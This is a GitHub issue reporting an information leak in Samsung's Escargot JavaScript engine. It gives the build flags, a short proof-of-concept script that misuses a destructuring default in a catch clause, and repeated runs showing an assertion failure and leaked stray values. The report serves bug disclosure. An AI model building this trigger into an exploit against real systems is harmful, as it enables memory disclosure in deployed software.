Samsung / escargot

Escargot is a lightweight JavaScript engine designed specifically for resource-constrained environments.
GNU Lesser General Public License v2.1

Infoleak #1375

Open 7331akasokoan opened 2 weeks ago

7331akasokoan commented 2 weeks ago

commit: d398f1ece3bae25c00465aea7f00b548d1131241

build setting:

cmake -DCMAKE_CXX_FLAGS=-fsanitize=address -DESCARGOT_MODE=debug -DESCARGOT_OUTPUT=shell -GNinja

poc.js:

var v0 = false;
try {
    try { throw {}; } catch ({a = (print(a), b), b}) { }
} catch (e) {
    v0 = true;
}

Bash Result:

/escargot ./poc.js
escargot: /home/fuzzer/escargot/src/runtime/Object.h:648: bool Escargot::ObjectGetResult::isDataProperty() const: Assertion `hasValue()' failed.
Aborted
/escargot ./poc.js
/escargot ./poc.js
83456213.01425552
/escargot ./poc.js
-1.7740938470966771e-181
/escargot ./poc.js
/escargot ./poc.js
-60.507442331163475